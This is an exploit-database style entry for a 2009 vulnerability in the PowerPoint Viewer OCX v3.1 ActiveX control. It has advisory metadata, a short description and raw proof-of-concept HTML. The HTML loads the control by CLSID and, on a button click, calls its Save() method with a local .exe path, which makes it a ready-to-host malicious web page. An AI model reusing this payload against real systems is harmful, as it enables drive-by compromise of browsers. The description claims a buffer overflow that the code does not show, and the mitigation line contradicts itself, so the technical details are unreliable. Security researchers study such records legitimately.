PowerPoint Viewer OCX v3.1

vendor:

PowerPoint Viewer OCX

by:

Mountassif Moad a.k.a Stack

9.3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: PowerPoint Viewer OCX

Affected Version From: 3.1

Affected Version To: 3.1

Patch Exists: Yes

Related CWE: N/A

CPE: a:microsoft:powerpoint_viewer_ocx

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

A buffer overflow vulnerability exists in PowerPoint Viewer OCX v3.1. The vulnerability is caused due to a boundary error when handling a specially crafted argument passed to the Save() method of the vulnerable ActiveX control. This can be exploited to cause a stack-based buffer overflow via a malicious web page.

Mitigation:

Upgrade to the latest version of PowerPoint Viewer OCX v3.1.

Source

Exploit-DB raw data:

<HTML>

---------------------------------------------------------- <br>
            PowerPoint Viewer OCX v3.1                     <br>
---------------------------------------------------------- <br>
-----------------------------------<br>
#  By Mountassif Moad a.k.a Stack #
-----------------------------------<br>
<!--
v4 Team & evil finger
Class OA
GUID: {97AF4A45-49BE-4485-9F55-91AB40F22B92}
Number of Interfaces: 1
Default Interface: _DOA
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False
Report for Clsid: {97AF4A45-49BE-4485-9F55-91AB40F22B92}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data  
IPersist Safe:  Safe for untrusted: caller,data  
IPStorage Safe:  Safe for untrusted: caller,data  -->
<title>PowerPoint Viewer OCX v3.1 </title>
<BODY>
 <object id=Stack classid="clsid:{97AF4A45-49BE-4485-9F55-91AB40F22B92}"></object>

<SCRIPT>

function Do_it()
 {
     File = "c:\\St_.exe"
   Stack.Save(File)
 }

</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Click here To Test"><br>
</body>
</HTML>

# milw0rm.com [2009-01-13]